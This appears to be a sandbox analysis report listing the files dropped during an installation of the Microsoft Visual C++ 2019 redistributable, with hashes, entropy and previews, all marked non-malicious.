                                                                        SHA-512:A2F2E514A941972E85CDA0DACC154EDF5BBADFD32359FE79203EE28A048E4AD16712078B468515F5CDDA625DFCA3CF5EEFFCE3D3CCFA254841958BC0806B1726
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9046
                                                                        Entropy (8bit):5.157073875669985
                                                                        Encrypted:false
                                                                        SSDEEP:192:W8lZ1UVDWkgWZTIsvPhghtQ1Qf4lCfnEtHixEGx736wHqItfSpOy2:9T15WZMgAYlOnjt5HLoL2
                                                                        MD5:2EABBB391ACB89942396DF5C1CA2BAD8
                                                                        SHA1:182A6F93703549290BCDE92920D37BC1DEC712BB
                                                                        SHA-256:E3156D170014CED8D17A02B3C4FF63237615E5C2A8983B100A78CB1F881D6F38
                                                                        SHA-512:20D656A123A220CD3CA3CCBF61CC58E924B44F1F0A74E70D6850F39CECD101A69BCE73C5ED14018456E022E85B62958F046AA4BD1398AA27303C2E86407C3899
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-363\
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):69632
                                                                        Entropy (8bit):0.14204316576173026
                                                                        Encrypted:false
                                                                        SSDEEP:48:tpZMc9EVmS9S26NRSc8k089dO6I6RLjxLp:TZMcsmkyREeP8aLVL
                                                                        MD5:52895B887E65131A0BE401E362EC67B2
                                                                        SHA1:77FB6897246AC51BD980B5066084BF905A8A1B34
                                                                        SHA-256:E02233823A167B3AC6D8AC60F3770E019A8772D930CFB851F67AC8EEB204577A
                                                                        SHA-512:F1BACD22FC1E5016F20A07A56EF88C56447DA6ED9B135308AA87460FCABB68F5D18DAB90E523A78A976F12391EB137BD43F76704B3B88C019D07D9D52E3C503F
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5584159664956596
                                                                        Encrypted:false
                                                                        SSDEEP:48:f8PhruRc06WXinFT5XYxdpI6jeBS2nQRSc8k0SItZQ:ehr1pFT2Co+0REfhZ
                                                                        MD5:97A0A76E097AA4380AC58513CF1E33C3
                                                                        SHA1:EEE2F98AF2AD83976B7E99BBCE61BB1FD02BC08B
                                                                        SHA-256:55B21841BD643EADF86864A3CB6EDE1E3FAF2CABB11812B316704B4D3D4F926F
                                                                        SHA-512:B0E5C6A5F7951533201442C7A3098AB857724E73EB9DA8352E5DD0218984FE4F8E31525B1FD67642AB83D5299E47FAEC2B59248845B9C6ACB08CD71DC8964D4E
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5638666227546747
                                                                        Encrypted:false
                                                                        SSDEEP:48:x8PhruRc06WXi7FT5XhdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:Mhr11FTd8aLVL3zyREfJoZMc
                                                                        MD5:01077FAD9CBC96BD8733EEF5BC7C3E9A
                                                                        SHA1:48C3949FEF321FE01B49CF2766FD22EC6F4A4B92
                                                                        SHA-256:7A60B5E0B869C6A9BC222DE88D686151CC4BF8D39054648E5E6C7835BA6020F2
                                                                        SHA-512:12E7FE05916FE420EF9138CA152D0CBE79E9677475E68A45DD41AC0F60EE97ECA0417596E6259E27B70D5872391A70C373374479F6E20B64C9BECE822D50623C
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.1020252931328785
                                                                        Encrypted:false
                                                                        SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKOs0zW4eM9Ra1SSL8QxMIliVky6lJl0t/:50i8n0itFzDHFsmgsaQ48QGIDr01
                                                                        MD5:33D7B88BD0D369F5A382C4927D653329
                                                                        SHA1:663FDCF5438F5711E8BAD620EEDE7506787BB0D9
                                                                        SHA-256:6C3413EDBEC0D920F270D712FD7A223C3455D0BD807D3C861C307026E3D693AB
                                                                        SHA-512:2AF548DD7D6B6661EE770BEC34B7DE9ED78F68A0A5898CFD22CDB41DB3C9EBCFD4A4A6A6CF19A56C46AE79C7EA3585E35D8DC014DF9C39DF6AB18CC643FEFD42
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5638666227546747
                                                                        Encrypted:false
                                                                        SSDEEP:48:x8PhruRc06WXi7FT5XhdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:Mhr11FTd8aLVL3zyREfJoZMc
                                                                        MD5:01077FAD9CBC96BD8733EEF5BC7C3E9A
                                                                        SHA1:48C3949FEF321FE01B49CF2766FD22EC6F4A4B92
                                                                        SHA-256:7A60B5E0B869C6A9BC222DE88D686151CC4BF8D39054648E5E6C7835BA6020F2
                                                                        SHA-512:12E7FE05916FE420EF9138CA152D0CBE79E9677475E68A45DD41AC0F60EE97ECA0417596E6259E27B70D5872391A70C373374479F6E20B64C9BECE822D50623C
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2460547016397883
                                                                        Encrypted:false
                                                                        SSDEEP:48:kGzuos4vFXiKT50YxdpI6jeBS2nQRSc8k0SItZQ:Lz7/T7Co+0REfhZ
                                                                        MD5:555BC64421B0BFA3EE9723C3F23D6344
                                                                        SHA1:A90430D1C1D107F09A74F4B90996059783472D79
                                                                        SHA-256:4AC31B291A9623068DFF6CB575B57BFFB45D97C7E5E984AF0DA268A2BCE06D93
                                                                        SHA-512:4FF8485FA7822EB5D9B17BA8624E6CBB34B05B227D85A1AF1C792496175B3C75DFAF6F9D06596221372140639E325EED9B868ADFB235440B01F8AE56A4A979FB
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):1.2501246123707326
                                                                        Encrypted:false
                                                                        SSDEEP:48:+8zuas4vFXiOT50hdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:7z1zTM8aLVL3zyREfJoZMc
                                                                        MD5:17A5479331AB427E4C172AD25EDB9C3D
                                                                        SHA1:0A19E88113A2910EBF96BA57C3FB65D92F5EC390
                                                                        SHA-256:892700FA4C3B9CFC108BA9592F19FC9CADCC29611C24BB5A398A496BFD566407
                                                                        SHA-512:587FEE6699C42D264F12AAA2FCCEFEE0E333574CAF473FA1B6C666CABA525F11D7FB35030A4EFAE9DFF85EB7D8BACF4DC90C7068E9AE31E3C67C01752D2D2E20
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):512
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3::
                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
